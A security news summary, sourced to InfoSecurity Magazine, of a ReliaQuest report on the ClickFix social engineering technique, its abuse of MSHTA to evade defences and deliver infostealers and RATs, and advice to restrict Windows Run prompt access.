ClickFix Exploits MHSTA to Evade Security for Infostealers
▼ Summary
– ClickFix is a social engineering technique that tricks users into executing malicious commands via fake pop-ups, enabling malware deployment and ransomware campaigns.
– ReliaQuest reports a 10% rise in drive-by compromises due to ClickFix, which also increased attacks using the legitimate Windows tool MSHTA to bypass security controls.
– MSHTA abuse, initially linked to ClearFake, now accounts for a third of defense evasion attacks, rising from 16th to second place in evasion tactics.
– ClickFix is used to deploy malware like Lumma Stealer and SectopRAT, often via fake Google ads, enabling credential theft and backdoor access for further exploitation.
– Ransomware actors are adopting ClickFix for its evasion capabilities, with 30% of RaaS affiliates expected to integrate it soon; restricting Windows Run prompt access is recommended for defense.
Security experts are raising alarms about ClickFix, a sophisticated social engineering tactic that’s increasingly being used to bypass security measures and deploy dangerous malware like infostealers and remote access Trojans (RATs). This technique manipulates users into executing harmful commands by convincing them to “fix” imaginary system issues, often through deceptive pop-ups that appear legitimate.
According to a recent Threat Spotlight report covering March to May 2025, ClickFix was responsible for a 10% surge in drive-by compromises compared to the previous period. The method has also fueled a spike in attacks exploiting MSHTA, a built-in Windows tool for running HTML applications. Since MSHTA is a trusted system binary, attackers leverage it to slip past security defenses that typically flag suspicious file-based delivery methods like phishing emails.
Earlier, the abuse of MSHTA was linked to ClearFake, a JavaScript framework that tricked users with fake CAPTCHAs to execute malicious commands. However, ClickFix’s adoption propelled MSHTA evasion tactics from 16th to the second most common technique, now accounting for a third of all defense evasion attacks.
Beyond MSHTA abuse, ClickFix has been weaponized to distribute malware like Lumma Stealer and SectopRAT, a .NET-based RAT. In one campaign, attackers combined ClickFix with malicious Google ads to push fake Chrome installers hiding malware. These tactics allowed cybercriminals to steal credentials and create backdoors for further exploitation, cementing SectopRAT as an emerging threat.
ReliaQuest warns that ClickFix could revolutionize initial access strategies for cybercriminals, particularly because it enables payload delivery through trusted tools like PowerShell. The technique’s effectiveness in evading email filters and endpoint protection has already caught the attention of ransomware groups.
Ransomware operators are expected to adopt ClickFix widely, with projections suggesting 30% of RaaS (Ransomware-as-a-Service) affiliates will integrate it soon to scale their operations. To mitigate risks, organizations are advised to restrict non-admin access to the Windows Run prompt, a common vector in ClickFix attacks.
The rise of ClickFix underscores the need for enhanced user education and stricter access controls to counter socially engineered threats that exploit human trust in familiar system tools.
(Source: InfoSecurity Magazine)
